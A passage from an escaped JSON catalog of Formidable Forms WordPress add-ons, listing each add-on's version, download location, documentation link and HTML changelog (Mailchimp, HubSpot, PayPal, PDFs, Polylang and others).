instead<\\/li>\\n<li>Load all custom fields right away since they aren\'t different for each list. Also don\'t hide the custom fields when a list changes.<\\/li>\\n<li>Prevent error with Formidable disabled<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-getresponse\\/formidable-getresponse.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28149579\":{\"title\":\"Google Sheets\",\"name\":\"Google Sheets\",\"display_name\":\"Google Sheets\",\"slug\":\"google-sheets\",\"version\":\"1.0.1\",\"new_version\":\"1.0.1\",\"location\":[\"fp.strategy11.com\\/releases\\/google-sheets\\/formidable-googlespreadsheet-1.0.1.zip\"],\"excerpt\":\"Send form entries to a Google spreadsheet as a backup or for extra processing.\",\"id\":28149579,\"released\":\"2022-10-18 00:00:00\",\"categories\":[\"Business\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/google-spreadsheet-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/google-sheets\\/\",\"changelog\":\"<h4>v1.0.1 - February 9, 2023<\\/h4>\\n<ul>\\n<li>Fix: Trying to deactivate Google Sheets wouldn\'t work if removed from the Google console first with an error stating that deauthorization failed.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-googlespreadsheet\\/formidable-googlespreadsheet.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"180495\":{\"title\":\"Highrise\",\"name\":\"Highrise\",\"display_name\":\"Highrise\",\"slug\":\"highrise\",\"version\":\"1.06\",\"new_version\":\"1.06\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-highrise\\/formidable-highrise-1.06.zip\"],\"excerpt\":\"Capture leads in your WordPress contact forms, and save them in your Highrise CRM account too.\",\"id\":180495,\"released\":\"2013-12-12 00:00:00\",\"categories\":[\"Creator\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-highrise\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/highrise\\/\",\"changelog\":\"<h4>v1.06 - February 29, 2016<\\/h4>\\n<ul>\\n<li>Send the custom fields correctly to Highrise<\\/li>\\n<\\/ul>\\n<h4>v1.05 - February 23, 2016<\\/h4>\\n<ul>\\n<li>Fix email field settings in the Highrise action<\\/li>\\n<li>Make sure the license key is a Highrise license<\\/li>\\n<\\/ul>\\n<h4>v1.04 - February 9, 2016<\\/h4>\\n<ul>\\n<li>Added options to separate out address fields. City, State, Zip, and Country can now be mapped separately.<\\/li>\\n<li>Fixed PHP7 warnings<\\/li>\\n<\\/ul>\\n<h4>v1.03 - December 10, 2015<\\/h4>\\n<ul>\\n<li>Make it compatible with the free version of Formidable<\\/li>\\n<\\/ul>\\n<h4>v1.02 - November 13, 2015<\\/h4>\\n<ul>\\n<li>Prevent error when Formidable is disabled<\\/li>\\n<li>Reduce duplication with initializing the api<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-highrise\\/formidable-highrise.php\",\"icons\":{\"1x\":\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2012\\/01\\/highrise.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"20811871\":{\"title\":\"HubSpot\",\"name\":\"HubSpot\",\"display_name\":\"HubSpot\",\"slug\":\"hubspot-wordpress\",\"version\":\"2.0\",\"new_version\":\"2.0\",\"location\":[\"fp.strategy11.com\\/releases\\/hubspot\\/formidable-hubspot-2.0.zip\"],\"excerpt\":\"HubSpot is a complete CRM platform with tools for increased leads, accelerated sales, or streamlined customer service.\",\"id\":20811871,\"released\":\"2018-09-04 00:00:00\",\"categories\":[\"CRM\",\"Elite\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/hubspot-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/hubspot-wordpress\\/\",\"changelog\":\"<h4>v2.0 - March 27, 2023<\\/h4>\\n<ul class=\\\"p-rich_text_list p-rich_text_list__bullet\\\" data-stringify-type=\\\"unordered-list\\\" data-indent=\\\"0\\\" data-border=\\\"0\\\">\\n<li data-stringify-indent=\\\"0\\\" data-stringify-border=\\\"0\\\">New: Added a new OAuth2 authentication method.<\\/li>\\n<li data-stringify-indent=\\\"0\\\" data-stringify-border=\\\"0\\\">New: While using the new OAuth2 authentication, contacts will now get deleted with a webhook after they are removed from HubSpot for GDPR compliance.<\\/li>\\n<li data-stringify-indent=\\\"0\\\" data-stringify-border=\\\"0\\\">New: Added translation support.<\\/li>\\n<li data-stringify-indent=\\\"0\\\" data-stringify-border=\\\"0\\\">New: Improved error handling when inputting an invalid Private App Access token.<\\/li>\\n<li data-stringify-indent=\\\"0\\\" data-stringify-border=\\\"0\\\">Fix: List data would display as an error after successfully authenticating HubSpot and after successfully clearing the cache.<\\/li>\\n<li data-stringify-indent=\\\"0\\\" data-stringify-border=\\\"0\\\">Fix: HubSpot access tokens would fail to save while the Geolocation add on was also active.<\\/li>\\n<li data-stringify-indent=\\\"0\\\" data-stringify-border=\\\"0\\\">Deprecated HubSpot API Keys are no longer supported.<\\/li>\\n<\\/ul>\\n<h4>v1.10 - January 27, 2022<\\/h4>\\n<ul>\\n<li>New: Added support for Private Apps. You can integrate with HubSpot using a Private App Access Token instead of your Public App API key.<\\/li>\\n<li>New: Added additional instructions for getting started with HubSpot.<\\/li>\\n<\\/ul>\\n<h4>v1.09 - June 21, 2021<\\/h4>\\n<ul>\\n<li>New: Name fields will now automatically map the proper first and last name values when sending to HubSpot.<\\/li>\\n<li>Fix: Nothing would get sent when a user id field was set to something other than a name or email option.<\\/li>\\n<\\/ul>\\n<h4>v1.08 - May 25, 2021<\\/h4>\\n<ul>\\n<li>Fix: Deprecated code was triggering an error when viewing settings for HubSpot actions in PHP8.<\\/li>\\n<\\/ul>\\n<h4>v1.07 - January 22, 2020<\\/h4>\\n<ul>\\n<li>If the API key is missing or incorrect, allow it to be changed inside the form action<\\/li>\\n<li>Auto clear the cache when the api key is changed<\\/li>\\n<li>Include the option to set the lead source<\\/li>\\n<li>Include options from other property groups<\\/li>\\n<li>Add logging (with the Formidable Logs plugin) and remove debug mode<\\/li>\\n<li>Fix: In some cases, contacts were not being updated<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-hubspot\\/formidable-hubspot.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28074303\":{\"title\":\"Landing Pages\",\"name\":\"Landing Pages\",\"display_name\":\"Landing Pages\",\"slug\":\"landing-pages\",\"version\":\"1.0.01\",\"new_version\":\"1.0.01\",\"location\":[\"fp.strategy11.com\\/releases\\/landing\\/formidable-landing-1.0.01.zip\"],\"excerpt\":\"Create beautiful landing pages fast and rake in new leads.\",\"id\":28074303,\"released\":\"2022-01-06 00:00:00\",\"categories\":[\"Creator\",\"Strategy11\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/landing-pages\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/landing-pages\\/\",\"changelog\":\"<p>No Changes Found<\\/p>\\n\",\"plugin\":\"formidable-landing\\/formidable-landing.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28127946\":{\"title\":\"Link in Bio Instagram Grid\",\"name\":\"Link in Bio Instagram Grid\",\"display_name\":\"Link in Bio Instagram Grid\",\"slug\":\"link-in-bio-instagram-grid\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28127946,\"released\":\"2022-05-25 14:13:43\",\"categories\":[\"Solution\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/link-in-bio-instagram-grid\\/\",\"changelog\":\"\",\"plugin\":\"link-in-bio-instagram-grid\\/link-in-bio-instagram-grid.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"170641\":{\"title\":\"Locations\",\"name\":\"Locations\",\"display_name\":\"Locations\",\"slug\":\"locations\",\"version\":\"2.03\",\"new_version\":\"2.03\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-locations\\/formidable-locations-2.03.zip\"],\"excerpt\":\"Populate fields with Countries, States\\/Provinces, U.S. Counties, and U.S. Cities. This data can then be used in dependent Data from Entries fields.\",\"id\":170641,\"released\":\"2014-06-21 00:00:00\",\"categories\":[\"Creator\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-locations\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/locations\\/\",\"changelog\":\"<h4>v2.03 - April 20, 2023<\\/h4>\\n<ul>\\n<li>Fix: Importing cities would stop at \\\"8 remaining\\\" and never stop making requests to import additional cities.<\\/li>\\n<li>Fix: Form ids are are no longer retrieved using a deprecated function.<\\/li>\\n<li>Fix: Some city values were importing incorrectly, displaying \\\"1920\\\" as the state.<\\/li>\\n<\\/ul>\\n<h4>v2.02 - September 11, 2017<\\/h4>\\n<ul>\\n<li>Fix: Remove invalid city data.<\\/li>\\n<\\/ul>\\n<h4>v2.01 - May 10, 2016<\\/h4>\\n<ul>\\n<li>Switch to using Lookup fields<\\/li>\\n<li>Add a link to reset the locations data<\\/li>\\n<\\/ul>\\n<h4>v2.0 - September 14, 2015<\\/h4>\\n<ul>\\n<li>Add options to import specific location groups<\\/li>\\n<li>Import with Ajax instead of page reloading<\\/li>\\n<li>No more annoying banners<\\/li>\\n<\\/ul>\\n<h4>v2.0b1 - August 18, 2015<\\/h4>\\n<ul>\\n<li>Add options to import specific locations<\\/li>\\n<li> Import with Ajax instead of page reloading<\\/li>\\n<li>No more annoying banners<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-locations\\/us_locations.php\",\"icons\":{\"1x\":\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2013\\/04\\/locations.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"11927748\":{\"title\":\"Logs\",\"name\":\"Logs\",\"display_name\":\"Logs\",\"slug\":\"logs\",\"version\":\"1.0.1\",\"new_version\":\"1.0.1\",\"location\":[\"fp.strategy11.com\\/releases\\/logs\\/formidable-logs-1.0.1.zip\"],\"excerpt\":\"See your API requests along with their responses from add-ons including Zapier, Formidable API Webhooks, Salesforce and more.\",\"id\":11927748,\"released\":\"2016-12-19 00:00:00\",\"categories\":[\"Creator\",\"Strategy11\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/logging\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/logs\\/\",\"changelog\":\"\",\"plugin\":\"formidable-logs\\/formidable-logs.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"170655\":{\"title\":\"Mailchimp\",\"name\":\"Mailchimp\",\"display_name\":\"Mailchimp\",\"slug\":\"mailchimp\",\"version\":\"2.06\",\"new_version\":\"2.06\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-mailchimp\\/formidable-mailchimp-2.06.zip\"],\"excerpt\":\"Get on the path to more leads in minutes. Add and update leads in a Mailchimp mailing list when a form is submitted.\",\"id\":170655,\"released\":\"2013-10-17 00:00:00\",\"categories\":[\"Creator\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-mailchimp\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/mailchimp\\/\",\"changelog\":\"<h4>v2.06 - June 23, 2021<\\/h4>\\n<ul>\\n<li>New: Name fields will now automatically map the proper first and last name values when sending to MailChimp.<\\/li>\\n<li>Fix: Prevent a warning when loading MailChimp action settings.<\\/li>\\n<\\/ul>\\n<h4>v2.05 - July 24, 2020<\\/h4>\\n<ul>\\n<li>New: Add support for MailChimp GDPR marketing settings. There must be a contact in the selected list before the settings will show in the form action.<\\/li>\\n<li>New: Add frm_mlcmp_tags hook for adding or removing tags.<\\/li>\\n<li>Fix: The email field wasn\'t showing in the unsubscribe settings<\\/li>\\n<\\/ul>\\n<h4>v2.04 - July 12, 2019<\\/h4>\\n<ul>\\n<li>Add support for MailChimp tags<\\/li>\\n<li>Add double opt-in for unsubscribed users that are resubscribing<\\/li>\\n<li>Add German translation<\\/li>\\n<li>Log API requests in the Formidable Logs<\\/li>\\n<li>Update the styling for the MailChimp icon in the form actions to better match 4.0<\\/li>\\n<li>Clean up the MailChimp form action settings<\\/li>\\n<li>Clarify the groups settings to make them a bit more intuitive<\\/li>\\n<li>Allow text fields to be selected for groups<\\/li>\\n<li>Show error messages along with the \'no mailing lists found\' message for easier debugging<\\/li>\\n<\\/ul>\\n<h4>v2.03 - October 26, 2017<\\/h4>\\n<ul>\\n<li>New: Add option to unsubscribe users.<\\/li>\\n<li>Enhancement: Automatically update subscriber if their email exists in the selected MailChimp list.<\\/li>\\n<li>Enhancement: Remove files and functions deprecated since version 2.0.<\\/li>\\n<\\/ul>\\n<h4>v2.02 - June 12, 2017<\\/h4>\\n<ul>\\n<li>New: Allow Formidable Address fields to be mapped to MailChimp Address fields.<\\/li>\\n<li>Enhancement: Increase limit to 50 for group options retrieved.<\\/li>\\n<li>Enhancement: Initialize database on initial install.<\\/li>\\n<li>Enhancement: Add basic PHP error log messages for failed subscription.<\\/li>\\n<li>Fix: Don\'t generate PHP error if a timeout occurs when fetching group options.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-mailchimp\\/formidable-mailchimp.php\",\"icons\":{\"1x\":\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2013\\/04\\/mailchimp.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"20781560\":{\"title\":\"MailPoet Newsletters\",\"name\":\"MailPoet Newsletters\",\"display_name\":\"MailPoet Newsletters\",\"slug\":\"mailpoet-newsletters\",\"version\":\"1.02\",\"new_version\":\"1.02\",\"location\":[\"fp.strategy11.com\\/releases\\/mailpoet\\/formidable-mailpoet-1.02.zip\"],\"excerpt\":\"Send WordPress newsletters from your own site with MailPoet. And use Formidable to for your newsletter signup forms.\",\"id\":20781560,\"released\":\"2018-06-05 00:00:00\",\"categories\":[\"Creator\",\"Marketing\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/mailpoet-newsletter-signup-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/mailpoet-newsletters\\/\",\"changelog\":\"<h4>v1.02 - July 12, 2022<\\/h4>\\n<ul>\\n<li>New: Added support for logging MailPoet subscriptions when the Logs add on is active.<\\/li>\\n<li>New: Name fields will now automatically map the proper first and last name values when sending to MailPoet.<\\/li>\\n<li>Fix: Users could not subscribe to multiple lists when the active language was not in English because the error check was specific to language.<\\/li>\\n<li>Fix: Prevent a warning when sending data with MailPoet action.<\\/li>\\n<li>Fix: Nothing would get sent when a user id field was set to something other than a name or email option.<\\/li>\\n<\\/ul>\\n<h4>v1.01 - September 14, 2018<\\/h4>\\n<ul>\\n<li>Fix error after form submit on some sites<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-mailpoet\\/formidable-mailpoet.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"163255\":{\"title\":\"Math Captcha\",\"name\":\"Math Captcha\",\"display_name\":\"Math Captcha\",\"slug\":\"math-captcha\",\"version\":\"1.15\",\"new_version\":\"1.15\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-math-captcha\\/formidable-math-captcha-1.15.zip\"],\"excerpt\":\"\",\"id\":163255,\"released\":\"2015-10-12 14:00:35\",\"categories\":[],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/math-captcha\\/\",\"changelog\":\"\",\"plugin\":\"math-captcha\\/math-captcha.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28144027\":{\"title\":\"Member Directory\",\"name\":\"Member Directory\",\"display_name\":\"Member Directory\",\"slug\":\"member-directory\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28144027,\"released\":\"2022-08-24 15:18:56\",\"categories\":[\"Solution\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/member-directory\\/\",\"changelog\":\"\",\"plugin\":\"member-directory\\/member-directory.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"172715\":{\"title\":\"PayPal Basic\",\"name\":\"PayPal Basic\",\"display_name\":\"PayPal Basic\",\"slug\":\"paypal-standard-single-payments\",\"version\":\"3.08\",\"new_version\":\"3.08\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-paypal\\/formidable-paypal-3.08.zip\"],\"excerpt\":\"\",\"id\":172715,\"released\":\"2015-10-21 12:20:35\",\"categories\":[\"Ecommerce\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/paypal-standard-single-payments\\/\",\"changelog\":\"<h4>v3.02 - September 14, 2018<\\/h4>\\n<ul>\\n<li>Merge the older grandfathered PayPal addon with the updated version.<\\/li>\\n<\\/ul>\\n<h4>v2.04.07 - January 25, 2015<\\/h4>\\n<ul>\\n<li>Allow amounts with . for thousands and , for decimal. If a . is used in the decimal place for the amount when the currency uses a , make it work anyway<\\/li>\\n<li>Redirect to PayPal correctly without Pro<\\/li>\\n<li>Make sure email setting is trimmed before comparing<\\/li>\\n<li>Add download ID to make sure correct license is used<\\/li>\\n<\\/ul>\\n<h4>v2.04.06 - November 17, 2015<\\/h4>\\n<ul>\\n<li>Prevent errors when updating Formidable<\\/li>\\n<\\/ul>\\n<h4>v2.04.05<\\/h4>\\n<ul>\\n<li>Format decimals with . to allow float to work correctly<\\/li>\\n<li>Get updates from FormidablePro.com<\\/li>\\n<\\/ul>\\n<h4>v2.04.04<\\/h4>\\n<ul>\\n<li>Allow the amount to be included in the \\\"other\\\" option<\\/li>\\n<li>Modify the user-agent in the IPN verification to prevent errors from PayPal<\\/li>\\n<\\/ul>\\n<h4>v2.04.03<\\/h4>\\n<ul>\\n<li>Save the IPN parameters with the payment in the format that allows for multiple IPN notifications<\\/li>\\n<li>Fix sending users to Paypal when 2.x is installed, but the old settings haven\'t been moved to a form action<\\/li>\\n<li>Increased security related to XSS add_query_arg vulnerability<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"paypal-standard-single-payments\\/paypal-standard-single-payments.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"163257\":{\"title\":\"PayPal Standard\",\"name\":\"PayPal Standard\",\"display_name\":\"PayPal Standard\",\"slug\":\"paypal-standard\",\"version\":\"3.09\",\"new_version\":\"3.09\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-paypal\\/formidable-paypal-3.09.zip\"],\"excerpt\":\"Collect instant payments and recurring payments to automate your online business. Calculate a total and send customers on to PayPal.\",\"id\":163257,\"released\":\"2012-09-04 00:00:00\",\"categories\":[\"Business\",\"Ecommerce\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-paypal\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/paypal-standard\\/\",\"changelog\":\"<h4>v3.09 - July 30, 2019<\\/h4>\\n<ul>\\n<li>New: Account for tax when comparing amounts with the IPN<\\/li>\\n<li>Update form action icon and color<\\/li>\\n<li>Replace call to deprecated function with FrmFieldsHelper::get_user_display_name<\\/li>\\n<li>Requires Formidable v3.0+<\\/li>\\n<\\/ul>\\n<h4>v3.08 - November 18, 2017<\\/h4>\\n<ul>\\n<li>Allow field shortcodes in more payments settings so values can be set from the form: PayPal email, trial amount, repeat period, trial length. This also allows payments to go to other members on your site.<\\/li>\\n<li>Allow regular WordPress shortcodes and Formidable dynamic values (ie [email]) in addition to basic field shortcodes<\\/li>\\n<\\/ul>\\n<h4>v3.07 - November 10, 2017<\\/h4>\\n<ul>\\n<li>Process shortcodes in after payment settings. Allow entry values, default values, and other shortcodes.<\\/li>\\n<li>Clarify the payment trigger options with \\\"Successful PayPal payment\\\"<\\/li>\\n<\\/ul>\\n<h4>v3.06.01 - October 12, 2017<\\/h4>\\n<ul>\\n<li>New: Add Paypal triggers to API action.<\\/li>\\n<li>Fix: Show update notice for administrators only.<\\/li>\\n<li>Fix: Add missing close select tag in global settings.<\\/li>\\n<\\/ul>\\n<h4>v3.06 - December 9, 2016<\\/h4>\\n<ul>\\n<li>New: Add Paypal trigger to registration action for the registration 2.0 release<\\/li>\\n<li>Tweak: Don\'t add columns to entries when there is no form. This is in preparation for Formidable v2.03<\\/li>\\n<li>Tweak: If the log file setting is empty, fill it with the default setting<\\/li>\\n<li>Fix: Show correct values in the \\\"paid\\\" column on the Entries listing page if no payments have been made<\\/li>\\n<li>Fix: Add a fallback if invoice is missing from the IPN. This will help payments get matched up if the id of the payment doesn\'t get sent back to your site.<\\/li>\\n<li>Fix: Payment expiration dates are showing in 1970<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-paypal\\/formidable-paypal.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"paypal\",\"is_new\":false},\"28136428\":{\"title\":\"PDFs\",\"name\":\"PDFs\",\"display_name\":\"PDFs\",\"slug\":\"pdfs\",\"version\":\"2.0.1\",\"new_version\":\"2.0.1\",\"location\":[\"fp.strategy11.com\\/releases\\/pdfs\\/formidable-pdfs-2.0.1.zip\"],\"excerpt\":\"Create PDFs from form entries automatically. Email them or let visitors download PDFs from your site.\",\"id\":28136428,\"released\":\"2022-08-09 00:00:00\",\"categories\":[\"Business\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/pdfs\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/pdfs\\/\",\"changelog\":\"<h4>v2.0.1 - June 5, 2023<\\/h4>\\n<ul>\\n<li>New: Field shortcodes will now process in field labels inside of PDFs.<\\/li>\\n<li>New: The ctype_alpha function is now polyfilled when the ctype extension is unavailable for better compatibility.<\\/li>\\n<li>Fix: The frm_pdfs_export_content filter was missing the entry value, causing some custom code to break in version 2.0.<\\/li>\\n<li>The toggle to enable PDF attachments in emails will appear more consistent with other toggles.<\\/li>\\n<\\/ul>\\n<h4>v2.0 - March 14, 2023<\\/h4>\\n<ul>\\n<li>New: Views can now be downloaded as PDFs. When using the frm-pdf shortcode, a new \\\"view\\\" option can be specified like [frm-pdf view=\\\"10\\\"]. To view a target detail page, the \\\"id\\\" option can be added as well.<\\/li>\\n<li>New: Added support for a new \\\"source\\\" option for the frm-pdf shortcode that can support a custom shortcode like [frm-pdf source=\\\"your-shortcode\\\"].<\\/li>\\n<li>New: Added support for a new \\\"filename\\\" option when using frm-pdf shortcodes to easily customize the name of the generated PDF file.<\\/li>\\n<li>New: Added support for \\\"paper_size\\\" and \\\"orientation\\\" options when using frm-pdf shortcodes.<\\/li>\\n<li>New: PDFs will now use the font specified in the visual styler. Characters in some languages, including Chinese and Hebrew, would appear as question marks when a font is used that does not support the language.<\\/li>\\n<li>New: Added a new <span class=\\\"blob-code-inner blob-code-marker js-code-nav-pass \\\" data-code-marker=\\\"+\\\"><span class=\\\"pl-s\\\">frm_pdfs_email_attachment_args filter.<\\/span><\\/span><\\/li>\\n<li>Updated Dompdf to version 2.0.3.<\\/li>\\n<li>Added additional checks for required PHP version, core Formidable versions, and required PHP extensions including mbstring, gd, and dom.<\\/li>\\n<\\/ul>\\n<h4>v1.0.3 - August 25, 2022<\\/h4>\\n<ul>\\n<li>Fix: Sections were not appearing in PDF files.<\\/li>\\n<\\/ul>\\n<h4>v1.0.2 - August 22, 2022<\\/h4>\\n<ul>\\n<li>Fix: PDF files will now use div styling instead of tables to workaround an overflow bug with large bodies of text.<\\/li>\\n<li>Fix: PDF attachments were only being sent in emails when the form was loaded from an admin page.<\\/li>\\n<\\/ul>\\n<h4>v1.0.1 - August 11, 2022<\\/h4>\\n<ul>\\n<li>A missing vendor folder was preventing PDFs from working.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-pdfs\\/formidable-pdfs.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"209561\":{\"title\":\"Polylang\",\"name\":\"Polylang\",\"display_name\":\"Polylang\",\"slug\":\"polylang\",\"version\":\"1.11\",\"new_version\":\"1.11\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-polylang\\/formidable-polylang-1.11.zip\"],\"excerpt\":\"Create bilingual or multilingual forms with help from Polylang.\",\"id\":209561,\"released\":\"2016-01-22 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-polylang\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/polylang\\/\",\"changelog\":\"<h4>v1.11 - August 8, 2023<\\/h4>\\n<ul>\\n<li>New: Product options can now be translated.<\\/li>\\n<li>Fix: Likert columns were not translating when the \\\"Separate column values\\\" option was checked.<\\/li>\\n<\\/ul>\\n<h4>v1.10 - August 16, 2021<\\/h4>\\n<ul>\\n<li>New: Submitted options will now be translated for radio, checkbox and dropdown fields, including translated views and email actions.<\\/li>\\n<li>Fix: Added additional checks to prevent notices for fields missing placeholders.<\\/li>\\n<li>Fix: Prevent a warning that would trigger when uploading.<\\/li>\\n<\\/ul>\\n<h4>v1.09 - May 5, 2021<\\/h4>\\n<ul>\\n<li>New: Placeholders can now be translated for all field types.<\\/li>\\n<li>New: Descriptions can now be translated for Address and Credit Card fields.<\\/li>\\n<li>Fix: Translated default values were saving the translated value for radio buttons, check boxes, and dropdowns in some forms with multiple pages.<\\/li>\\n<li>Fix: Default values were not selected for radio buttons and check boxes in translated languages in some forms with multiple pages.<\\/li>\\n<\\/ul>\\n<h4>v1.08 - September 30, 2020<\\/h4>\\n<ul>\\n<li>Translated more values (summary page, placeholders, validation messages with ajax turned on).<\\/li>\\n<li>Get available strings to translate from core Formidable so new settings will be immediately available for translation<\\/li>\\n<li>Adjust layout to match Formidable 4.x+<\\/li>\\n<li>Fix: Update Formidable translation page to work with current Polylang versions<\\/li>\\n<li>Fix: Formidable strings weren\'t 